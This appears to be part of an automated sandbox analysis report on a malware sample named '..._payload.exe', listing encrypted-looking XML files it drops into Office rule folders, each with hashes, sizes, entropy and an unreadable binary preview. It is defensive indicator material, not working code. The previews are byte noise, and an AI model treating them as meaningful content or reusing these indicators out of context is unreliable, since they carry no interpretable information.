                                                                                                                          Preview:<?xml.CW....Z...#......d..[..@W.4.w.F~.[.........j..."...........v..IVKvZ0.!W.O....:N$.k..-.....{w1..f.6.Q..nP.....c....4...n...e.3.y.(.....~.3[......I.bv.FF.qk\...h.;..........qPS.}...Z..c..@I...lo........ .?.6..x.......o..A./..o`...!.......Q<.G..v....{.=i.ez.n,.)KS.b).}>.=.5f.O'r......S..O...~.y..s...X.g...$6X..:+y.h#....B.\.7.....SUT.....8.e.&-.Et}4..M-........... ..n.{..v..........{.=........[..-9......g.p.<......p6.J.....S4.....V..i.@...LOS...S:...iZb...a...T............]>.......__.u\.....X.}a.....U.zi..B.m....;.o(..........!H....P.vy..[......c.OS/?..&.!.T.9..AC...~.4.&].H.R....6...8.R].g...oj.)...=...`ib(.....a.4$\%.>^..W.z...d..[.`..[..Y...qH....2.4'....?...%....].B..V.;..e..*..7.].l..*...?z.\.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10882v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.9360053323179205
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:qDxV1gGAlcyZ1hrVyIu6rDJQW4+DuN58hcD43POzBdSnTO/I0JTo6PID:CxNSZ1pwIu6r9smuN+h68TQ9JTo68
                                                                                                                          MD5:4DF2635E29ED18EB2FC5450A9AD4737C
                                                                                                                          SHA1:23DA92040737953D4A5ADFE7A8C7C758AF2059C0
                                                                                                                          SHA-256:38D16F049E921120E403B81B6511CBE8447FD8A3DAFD1DB1A4160405232A945C
                                                                                                                          SHA-512:7CBF3B1A8648A9251D2B1AE14F56D207316EF3EEA219953B470CD05C58367865546CE39F941DAF18C915E8982CC9677FEC725156F7C57947766616C165937B0E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?..y. T?AFC=3.q..1....^.:...5..{..U..!.;(F.M}.N..C...... 9....3.#.t...}eX..v....A.R...d.`..3...>.<.3...e."x... ........p...##..s../H.f?.-...-...<.N.....e.O....[..Q@|6M.L9....E'..'*..p.\n.v..S8G7.f.4.J...i.$..~HK.;....."6..........s,_...1...(...f..>.6.$.2g....n....e..P.EY....CZ.~...O}D)T.S.A..+.,.......L.-..u....Tc}8..Fyw@....._J.p<..{'.......D..R.\...Y.".@.3..}...oN....."..e.bK.?.bs.f... 6G.I..c..5.uU$f.73s.2.9.#..._..f..7T&........c.....j:[?G......^...|..rc...1....`.....e.\..B.......]..`......H..ug...._..3+...z@[.V...+.@6.........a..R..".U5..&>X.....u..`...@1.5....Q........^.x..t.".<..!....r...(V..#BT/.._.w?..i2.e.j....W..nA..S...V..p#>.H.o.z....{....7./.~..o%.U........B.7.f....s..*9.K.P..+...h....1...L.....w!B.8oz...rm.....V.....Sq{...?~G.G..%.".)......?k...v.&....R...*)H.-,.....|^....I.v*W3.,wb/..y..xS..x...Den......Y.kr..b.*W4.1-m...-%|.).L.O.d.?....d.J.S..k.I9x.Y...t)a?BN`.[..=&h.;.n_/..icv.K.YrSa...:<..Y(...T...cT....>~...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10902v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1021
                                                                                                                          Entropy (8bit):7.781290646263582
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:wWrJvawSq07satDzybeKq5ji6YXSQsvCwQLYtc7Vf3Uvh6KB9IOSwz76YhQEGAsS:wA0FzQqB4Ivz6Rg19I22YhYAsNObD
                                                                                                                          MD5:998A893C49A0D63DCEA1749EB94F34FD
                                                                                                                          SHA1:80669ABACE52C69E33CC2A1CC1713F56CBB3F695
                                                                                                                          SHA-256:AF03AD2A95DC108C814F52DD0157B30D7C678333834ACF2AEE308AC314E3E4F3
                                                                                                                          SHA-512:D9382D59136E3C2FCCAE1BFBF635AC38A2E30CD4C6E7FF6D2128218BEAC734E1A0448C21640FF738BA37FC2A029943F57621D0C028AA28C16EB8493892DB10A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.'...ZgJ..,..j.m...K...,.....:..d}.(f..(.V..Ghv.&..^w.}W.4w...v...t..A...T;.h.. Jm$..y..)S?.'u....9.us.+N.....r....t@S.a..6...X..~=...]............6."N,D..Y.i&......l.Q1#..........6...|...J#^...t_.......d.,.( .R..BN.S.....S<.....W..N..........D....q..^.S....4.T..1u.....b.3....[......L;ndx....z.2....z......-.+..].....G[.?. ...,.T....MR....>g.\{...5?V...D$..*..)..NO.f..5*..8Y-..m.cp.B..f.Wx..I..$.#.}.y...9.xu..t.r.q>Y..!.( .BR..*..t..Mhmx.6.?.+....^.*).=..+.Rz...gM.......XL&$y..gA....;..S.Z-$......a............q@.<.?.......R.~1.U.u7<..._.....r...s.'D...k.....#.g..$.]...........,p..?.....`r..9..GB.......*..&.xqr..&...I.5}.`......>.k'..q.....1./....d..)r..p..._.ug.........|..jsd.._..;-.I....D.....q.........-r(....~.Z."p8.....".F....b.5....T.bi..>..^.....t....(....y..wv.....7.r.K..7.....R....@......4..%[.%2.k8Be....e.:.....v,....PU.^.5........s....2..:..wi...u.jj...63.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10906v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1398
                                                                                                                          Entropy (8bit):7.87135133326526
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XhfrtumniDgY1oQI8VwmdKZFhmC1FKUjgWFs8ShB7sOjMtlLzUdP/JM0bD:vtiN1oQpwIKZFhrvi8aucslEdZvD
                                                                                                                          MD5:FC37F3044ECA00C1557BE1B9A3F6EFED
                                                                                                                          SHA1:87F80C3385EA33F71EE93C8AC8430D25E8696A44
                                                                                                                          SHA-256:07053AD02D7F1FD10FF5380A493590DB3F7BB5D25F2C56323BCEB95EFB21A1C7
                                                                                                                          SHA-512:C0AEE02D01E76655725AD96869384E09F396D9C7FCD2627BED6E814FF56958E4EFCF53A9DDEC65646F26808DAF2F11D6651E6FA05642C4CCE06797ACB7E4D0CB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml .ih!....K.....*..~46.r..'.........2I...........HS.Dl......H`4d.q.L.!.....n...R...7....[...{}....w......d...j..;H....|.\C.f.....l.*.....*@...*U...Q.-F@....L..,........a.&....h.T.s..&..n....~.O.....i.Y&.[-`....."..H.w..T.qHb...}...3....#>X..B.G.e4.T...rnM....n...U!.....7......T.w...&.A.@B.#...M..T...R.....f.r.y......o....8.S.!......Es...;*.(%..8.t...H..%{.%....Jn.g.6....EU.J.v......#z...{.r'X...........=....."....`f..4. .FU....6ub...I....u'{.......b.e..\;D..C$..&.QFRd..G..A../_...:.g..-Q...M..Pc.`!.I.1r..R~.yW6..`.[..w...i.....j.J.%P)o.AG..v....qu..sz...].W...W.F.._C.X-....S..N..m.....).Iu..<).0I..,.#.m..$.c.@}0.a.R..gv..\..c9EY....4.+#Z...V..s.1......jh.k..Or..*)W#.........y...:..O.pb.};)p........}.+aqW.,2y.o.}%....i.\...M........X]eY.&.;.N5.....F".a.Y=..5...n{3..F.|H.k.3....JX]....g.U..W@.........:..z:}d..ic........R."..O..u..;..R.S.....;&...........O.#.....RP.)i..[..Tq|......&P...l..V..~..w?..a.=....".......b.(.9g..A...\..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10907v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):937
                                                                                                                          Entropy (8bit):7.808263685944192
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:uDE4NdO5q9Zi+D+V9ng7kz7uZUxRWrJ/a8DErDCeUuaVnf8AqjQJU0qk+HwmKXxh:z4E4xDdY+1JEHbUD90AqQUimkV/3bD
                                                                                                                          MD5:1A0CD985FCD34E7A76EB5575DE6A0641
                                                                                                                          SHA1:790E96102BB1B02F27335DAF3E7D78B51D896411
                                                                                                                          SHA-256:8999C8020F12675F1945885E12A384ABEDB6536B8AADB7A7253E46DF8CC5602E
                                                                                                                          SHA-512:EAEB7EAB5BC6B81CDD109E5FC3D05FD2128947F23C2E626546E33F483279EF3F4717BF2D3539D05155C111FF54514B979D0B34CC1BB34735A6C9647B2852087F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlZ...q;...f..T..Ub.2+....TT.d.ds).|.x!...E`.hs......d.....k..ZLw.....X/..;H.....%..^./......:.9.p.D....;.F.+. ...y....4..r.O@..w.-.c.....W.t<.s........x....t...............o..#_?..mLk............y...17E.T%.9..V"#H..V..K..%....ML:..t.^T......5t.<...._. J......[z.u........O....c...U...m....k..........!'.Q.W.....v...K9JG.T.V.L..e&....8'x..w....[&o........M.'nh...i:.F...(...]'."...!....O.E...r+......{7.B8...SL.Teh._A(...`YJc.D\UT....p.j...k..-..G\....4.;+..2...f'.O.URD........*......?.I.E.-l.{........p.t..l..Qh.~3T.J..n@Kh...e.4'.L.P....?.....s.N..<....@#,.#.z..P~.cC..n.ej.8.. .....?..}. .`.T.'..$..p...lI....Q......5...=..$..8.e.y..k.Y.i.."..&..c...z1..T@.M........A..M/.J.....]..dg....zn.x.FK..{4.}...'%5[.N.t..w.Y'|..E.1.u.9.....v....B..s.......3....i...|T_..<.6G^".%..*.....z.N<Q.....1...../...Nv...m....YphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10924v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):891
                                                                                                                          Entropy (8bit):7.742457128167431
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:BGCCQoP5O+gWTs6y6HLe4Wks6lmUA+62YYkShbD:B/oP5O+gW46ysLe4WkpAFiFD
                                                                                                                          MD5:9DDA68767DEE1DA59BAAFE363382A9ED
                                                                                                                          SHA1:9C44F4F51F72ED4A65235277A374FE2F207F0059
                                                                                                                          SHA-256:E2BECB42C30B269596FB3F8BF5EE72312B27811C429F2F038A55F3DD5FB5A393
                                                                                                                          SHA-512:9D03DB498440F99FCD524A81B69906C4FA51FAC899186D69692D1D4BE2D2F9F14E5A8CA15FE43610DBDB3268B6AE6BBE4C3453722D82A429D615C8182EA66CF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?r...l.oFk.*K...x.9..Aa.........4Vu...v@.o....x........~...0.h*<..<..J.OS0...."..G.......q>:....qW...Nj..J/..9(P..HhK.u.n..F..f.M.f..............%.:..'.h...H....J..~>.+......i.L8..E.K.......%....s.U^D...q|.O...{aE.^.KX.|`2S......m..yA....dz.@j8T_..E+....Gr...S.#.....q..q..?Xc..y....x......-.W..{...C....C..i..&..7LBR.D.....%.P.'....6KP;../....^.:.d....`.k..l.4p.Fk.....H..Z.D=..r=/..I&......._;d}..\P....u..8.F..z.s..U.h...:.r..WqT.C&..P....F.?..f....*......7...G.. .4'k{..<q.....o9|.....kB...i..;r -[.>.=......3uY\".N.i3R]....e.z'.../...&...-..=...v,\.bY..b..d+..x..Oe..[..66..'.N.6:}P&>v...M..dh...No.[,o.)E.[y.:/7.t......{5.y. M...$u..&[.....P;OOK..M<t.....KM.....^..v .D-.K2.....Lc..!R....w.G....kZ3BU.3?....Q/.PT...ww..n.B/..F.jBQ.H....*W.\mu zo..4t&.<.)...'.....TphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10925v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1049
                                                                                                                          Entropy (8bit):7.812451822767226
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4tSdIHLoNYnH5vBvSrRctXLQD1H9jOIfDPftWzyVambD:ZAoYbmRBD1HcI7n8zyVVD
                                                                                                                          MD5:6A3C78E11DB7A5A457442939E9A9AB0C
                                                                                                                          SHA1:2F3873325ABCFFE865E2C7810A0D99416FB29F77
                                                                                                                          SHA-256:D3990CB9B0E870F398EC048C1A8AAC781FC84219DD4DE0EF6005DE255D3ED522
                                                                                                                          SHA-512:24F24D8F36F88CFE80279AF7CA775A418EC58A59A3DC6C28005DA5CC6C795CF0F9D58E0F4826058FBA2545DE1C3F90DF7AC8A6477749C5A91C056DF32EA1C30A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.............l.m..6.. .......x....L........}...........T7z[..mF2+.?.e.]{....*.+...i..S.u..h........)t.b.o`M.\J.ki"s...y.Axf.W....:B|.....g;..d....C;\'Qq...n..P'...."....g..2..=S._..U.=...H./..16d~.E...1.i..tu.%.$<.1sp.*.K.i.....+.v^..j(...I..=d.*..VQ.&....r.>&~}u..p.....N..*..G.2....../W..e..E.........V....oJ_...t:.O.W'(Z...a.Wa.]........K.a..>a..5}..K.h...C...!.l......._...,.Qj+n..].......C...WN`.u..*V.x......M.P.|..kQ...{.....>..H/3.i~.LM.....~....~R...9}}.?...t{..}Q...{..MF...G..'..x........G....2.=D?.L........l>.N.u.3h......-.?.~..N..h..c.A)....Q_Q.<...%R....n.....[R5...%.M..c..GO........yT.>.......]....1*.}....d..j...Q.......>...x...6\....s.;.h........\5d...6..-y..3...y..+v...B(t...,k..wREK2.....{.g..lbS......C..).NX..d(7;2.....4..S.0.....D....:.!i.....x.`.aQ.q...4...Y..T..Ov....K..`.L2..N...a...W.tS*.o>.I;L..hB."m.33e..Br...c....,R....d....z.#.$..../SC.....[($.Y.n<..o.......2C.M....?..l.$.K phJtdHo970vyx7vwlYG00OakDR75R

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10940v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):885
                                                                                                                          Entropy (8bit):7.760921945777866
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ymiNgt3hY9T9QvoybSBNPPEi0uF2rWVRt4N1DPbD:yj9TdybmNHEHu/ts1TD
                                                                                                                          MD5:7F56E86F01559D8C29463EFF995950D9
                                                                                                                          SHA1:CDCA1348C492C3106188BDDD40C80EEF81AB684D
                                                                                                                          SHA-256:1E901298C4EA17BEA253D0B8876490FD7388B5B52617DAE41AE55DDD79395EBF
                                                                                                                          SHA-512:A4DE80A567C2533557001A4580EB81F170E94C63BD47A80B907A411A71786ACCDBDDA0D4F4E4C747200330E3062A1A3E9A6D8E79846344C2ECB8A8A22A117FC7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...B.T...w.q......'X.K..F.a).a.%.....C..w.]&.G.OF.T;Yh#.w.O}....1xe....eR......]...k1.q.......[...v7..q.8Ou#....DcRW...%4.T.a,....pG.fB..q.Z.1.2.'..Tr.p..j.OZ...\.."...b1..$P......\.h.:...a..GP.X.3/.V.K.R,......)...oi..d..Zl.).S.@...jGv.0.......6:....S......S..........q..C...;......,/uDp.vq..1..yq.R..E.]..)......PuB.E..Vr...hp.........w.1.[.....".Yd.>.?...^.E.#..H......T.....V6YZ....9...1.N...jA......h.T3.7.!~!......|..... .^<..P...|.....2..`.#c.'..8.`....`.F.63P+...7......Y..oA....W.1....e.@.^.&4.?|..+.b.j.o#./..."=..{.+Q!g...i.9f..._.j:...3...>.X....|O......+..\.u......!.yY...n...-<+.Q.sJ..G..r.n...+).br......k!b...&..).EK...8..!..O...&38.1......#...f..r..".e.....;.&...AE.T.@.S........60-."..Eh..FL..]....I.r/..e..L..A.....d.....uq..l......U.J..5...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10952v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8529
                                                                                                                          Entropy (8bit):7.976564376409985
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Az5fS9e3QMuQLGBvRxb1WDpBWDoaO8x/3uj7eZaFTREF1Lfzpacz1UTcI5b:AzoBMdLMb0DizRyiwVczNI5b
                                                                                                                          MD5:5A6F210EE632B2F56199D5D1FC7BA569
                                                                                                                          SHA1:217BE3C0FA69225284A18BF33A9C82FF8A194EAC
                                                                                                                          SHA-256:B5EA1413FA35FC01A3B86FA9A20B6C2124B12AE520F0800A95E5400E242209BC
                                                                                                                          SHA-512:F896EF43F0638B7343D4AA5849FC40B1C4DB79A3286B0D225F72E87F24755ACED203BE63CF6F99AD72B55B83316405F853A3C0F06F85111E0FEA93A6098CCDED
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlo....g.D.q?,.0.,..........4...X.{.f...?.8...]N...t.V.^-.H%D5&.i?.x|..4....~`=S....vV_..Vo..W.A.3.... @.......E....]..T....R.6.5f@..Qe.i.n..T(H.....cxcQA.y..c^.+t....k.%...2e/m'C...KZ..g..5.z...U.T...g\M.0..@*.....'aL...'6i...A...X.R....^[.3..T.J.....]....N.~}X6...._.V....."\.hP.....k.....N..gy$[]......TY!....[.. ......j8.H$......hrr.s<.....,.~...}9.j.C.o..IP.w..xa.S.a(1.....0...oJ..C.zb....q.5....*....Fw...lm...h...:..2.....{..7.U..."...(K...(..D.......H."...b...#p;SB.5l.e..=.............1.R.dF~...Z.=3V..\.E.'..&.....p...u.......No8..K7.hx...L._lb.......@...S..a[.!...d..\I..F0...j$.Q.]..M"..sN..b..F.9.U...Sk..'s....J.U~...T..U{../>.....e...@...Z7..Rc.E.....C.........P...{..ixO..`.l4_.S.q.%t.M.{%....cA..7u..n..9h.........*!.1..S.'3..z...o..j...(....r!y.c...7.%..I..+.v.......+.{w...o....Z......EpOH..'t..HJX......)"+.,7...1.dT...P....,=..-d....dz.."v-\..l@..cV..~....*.../%.Z..`~.........-."7..~...w..].......W.P

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10955v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1242
                                                                                                                          Entropy (8bit):7.8344894589703555
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:f+GPIvtVDmi70c5CfNai2c4Nvl3odj9ReKl+0jCKgNszdN+86XtqbD:ffgv/d8NaJcEvl45vXl+0jaF8GtID
                                                                                                                          MD5:3D6B6EF7D953FEB9AE97247F22F7525A
                                                                                                                          SHA1:B845018822B59BD489006898285E0E47ACB03EA5
                                                                                                                          SHA-256:5DA5B3E12E871A9E6CB5719DA99B43F9563F5F1670A38E708FBAFEBCE9FF9F97
                                                                                                                          SHA-512:08F47C803990CAE54C11AA1A55CD274F0303D1299E0287BADBAD836000162DBF50CF6A4A1A1E46181FEF04CA8D6B1E99B36216B65B478DA0A3B2AC455355DE8D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlJsG.Y.41.O.w:.$+h.wv..&..F".?.2..X.zzY#.L...9...\...x... .;j..MYb..q..-.).].k.J....M-8.*.....L.:..Lr.1...5...f*b~..l.9..D.......c.R o.7,.3H:..,%....v."..NHh'e.:...w.%......i!.......$k.!gk....{......%.-.....#_.Z...A.yd_`&...q...}!.I.J.bY}Vt....N.T.H..X`~M..xZAEO...i$;.'.,..a_.wJ8.@.....].rt...Y.~...rZ38&..'.R.{.7L.!2......K..-.E..&&.q..K..,%..(..m..p..........+.W.#..]y....F<V..9c|1.]......Z/...{@1..3&^.UBO..L.&.2S.....*.n.i.L.K.(.}"..g.6B^.q..fT.O....>.5:.Y..T~.#.k.a...,.I.-?.^.._.g....m..c..4r...rv...#.j[..}...t.6.=R....d..v..v b.....9.......a...ft#......l..0.&..|....I..0m(X,.C..5..!.8...U.z....`!...R....T.m9..U...rc&.D../!..l.P+..8F=........K...3t..(y..H..H0K.i...&.k.....A}..E..ib7...$2w>Mum..9q...j.W..T..u26.!..>SX..._..zs.I.8..>8H)..........j.M....eZ.....Y..ZJ..o'.9.@.b..U...3E...z...U.,`._.8c$.....[=t.|....o.? .4_.H.....C.W&:.I.B..C...7..~...u.n.Bs...R.S...~O...xE...'..).k.....4a?....~a..q........2.;..;.I.G.~5.X..C.V1..h.....%.h

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11150v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1185
                                                                                                                          Entropy (8bit):7.838845375151283
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OVJbWn258N9G8Asa9q5amEJTGsjYsoNT6jnaq14jFZ52+bD:4bWN2rp9cEJTGUBoNT6jna5jFbD
                                                                                                                          MD5:EC5B7AD8F5BD284AC6DD02D12D57B0BF
                                                                                                                          SHA1:2A778518AF1A324EAE2BC52BD0AE25F65617497C
                                                                                                                          SHA-256:BD4EBEE08588CC79F531D7DD2201A86D9D77F6C5C79BE9F1970C3F20E1545B6E
                                                                                                                          SHA-512:E212BF058B454386B37B46B8CB15903ED46DAB5422522DA7A42AD159C76F95D4EA572510EE08526590905E76BEFC9B9EEC110FFA65C3F93305EF3E5BBA17E227
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml4...,.1(.....@.y6.i......U..%.m*L5}L..4 "z......ux.....W.I.......3.........dy+...c.E~.\..J......x}V....[4o(.g#t..b2.S..e(P...S.S.`D...cf........J.........%....[Q38 .Z.p.......r....$..9..E!{Ki...lS.....p.r..p...@.];g..*.M..?..Z..)=wXsf.....5QU/...[.[.........h..H.!99[.6..g{.Yiq.>(..@.^..2....`.j.b.e.Ib...%....v..3.Y,..1..5x..~.........a.....|J.j-...q..Y.../.!.E...j..0.-..s.r..g._.....*..n..Xek.Z.&5....O......q.....[..........+!>Z...'KK.l.......Nhm.tc..{<.........7f...K...O..[ub.j..\}$....UaV......L..FG..{h.E..(.$....'..6k.1'.M.TT.}LJ`G...k......d..m`.N......d.Zf..m......E.W..m......tR#.jP....L$.z..t....8.l..8tq/.v(Z.{.Y.E?.,.X......^......&..P..<.d....7........hK..cd..Z ......c.......|..#5X...7.2xWls4.V.~|...>HFR,`.P(....3..J..Y...|.......(.........._v....A.m..3|..{...n.4..{...H.t.....f.#.....)%.I.\.....:n.....L.....a...Y......D.....-..7.'....S?...5.U.ZC..:.BA.^.<UN7...x.v............u.*..rj..9....#..N..I...E........R....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11154v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1073
                                                                                                                          Entropy (8bit):7.823955170035604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:BG9gaC4OIkLHvcs59ERMjVaAg0v9xYASsofOwd+BblKVHzm6cySsWPhp7Pd+bD:WgaC4OIkLPvESjVDg0v9xet+t2K9zPKD
                                                                                                                          MD5:4CEA19663BEED974C86CC9CB8977860C
                                                                                                                          SHA1:82AB9B465AEFA020C87DA6D8006EE6F958D86166
                                                                                                                          SHA-256:D75346F59D2F369ABD3354AF81CBF1DA28F5E4121EBD3AF67A4E43281640FF48
                                                                                                                          SHA-512:3002D1BB7ADA3A9145A8F443B7B1DA307FDB39FF1A24F4C17156F9C09B3F5CBABF362B40DCBC62FB344495332BA20942C2BAF5B45E7D618562623756263AA7CD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.?."(Y..{...j...$..."......bI.[~.V.,.4-h...X.f..1[..y$Y.....gW,...<..-).S........"S...Q.b..CN...}.M..Wq.h..`[...(.U~...;.>.:....[.;...O.....r..r.....PG.L.....|>.7%.&.Z...l....1.)..e\.......g.....[0...=.r.._.A..}ki|...|2.jE....Hd5W6?&......|vM.....Ie.=....e9F.Dz..Q0$.!i...o'y.<.zw.$B..{m_.^U....2!..jg..p..R(&^j.....9...l....E..%>..lfP...n.j........S./<..e...{D.g.x..h}.`Y..r.......$.._4.....7T>.h...i..V..z..b.'6.~....S....N....G..F2.y)..!&......%.,...h>f.....~.....FsJ._.....g.FH./..).t..Vl..)0Rp.....>8.......,{.lS..pX.../=?2.#..x.wS....!O..vd...L..7........-.A.z...3=..:.A...W)o.1..u..5...T@J....Y.=..|o.c..!u..Y.W.z.>.Y..ta#..h..m6.....s.q....p-..<..y%.QqY...+...Uvqww%(3....7....r.n.Z.!&...95M....J..e.W(......R...:....i..M..T. .G]A.../..I..].@.T.}....lX.!.Z.$.vI............:...5.!B.....o.'..,'.!G..7........=8@...Y./j&5....<..%..q#_Z.(.6.o.....+...]U....x.M.S....k.v_~J.(#JX..f.[........^..$.`.z.G.F.k[.C.q...D."....#..J~}.K.\.sdHphJtd

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11187v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3232
                                                                                                                          Entropy (8bit):7.939119711636276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:mt0eUb4ypx6ooXTtlJIf17n3HdOxAOHC+aQVEeEI6pB7:mCb4sOXTtc93AHcfe2B7
                                                                                                                          MD5:217D8675F0FEABBDA56A1DE58EFDCE9C
                                                                                                                          SHA1:854CDE1C417FC3AAA6033770D22793BA427404C2
                                                                                                                          SHA-256:CEADE6EAE0D3F66B21084D66F9CCC906E378934BB29A189EB5CE166DB579D33A
                                                                                                                          SHA-512:9B408458B3B787224164BD6A427198C4AD625C8E8AA773C21FCCC5815ADBE8E2600CEB90DCCC0A7E11EA6F09EDCF516DB09CD6CEE3EDB66FAEA5976CE4FDBEA4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.f?..~....<!o.T.8.0&'aNJ...5....m.tA%9...~r.A.x......I....(Q.O'.+.....KEi.8....t.K.f1.Z.e.h.......i:....z....r...fX..<'q.@6.H......^h.o.B.p.9.....i.L..pyC./=.3...Y.7.%.eN...k33O....5....l.EV....l8uX..z.9....._..n.uD.B....ihI.a\"b..L......:........!P...E._l]T.f....9........c(0k.......6.....|.%.4,.s#....2.k$5.MC....._.|T,.[...E."..x.y...n.0......f.Ew.2...n1.}"...,........Q.Y[..!..u.xF...y...B..'$..Bq..CbB...7B.yr....o...*.n.........W.kg..Y5......l.N.(...lng.......A...%.@).+.$..W~.b.#j..|.{E......K.w<.<..W.l.L@$.r.......O.+.I.......vJ..Y...Yc...`...Qw|.P../.}.i..z..fx.(...%~.....Z...g...a....F..sywhoa./&.P=xM[.+Wr`E..1.g$z.i....Z]..u...2..K....~....5..<...-`...*$v~n.aK.W.......@...h...Qb.|.3....|.+.a.(.m^.J..l...@&.X..C.nu..Uv...q..f...u.......I"#......x.....c.MF...wj...G.......T.....@...3.P.......9.'.sd...M..g.x.-5..5H!.......S...%7..7.sv.k=ET...._.....O.n..x...Y..]..2.>..;...b..U........._.K...4c.ho..jd\<._.W....T....edd.._J..EDe...nv.om>n...@<x

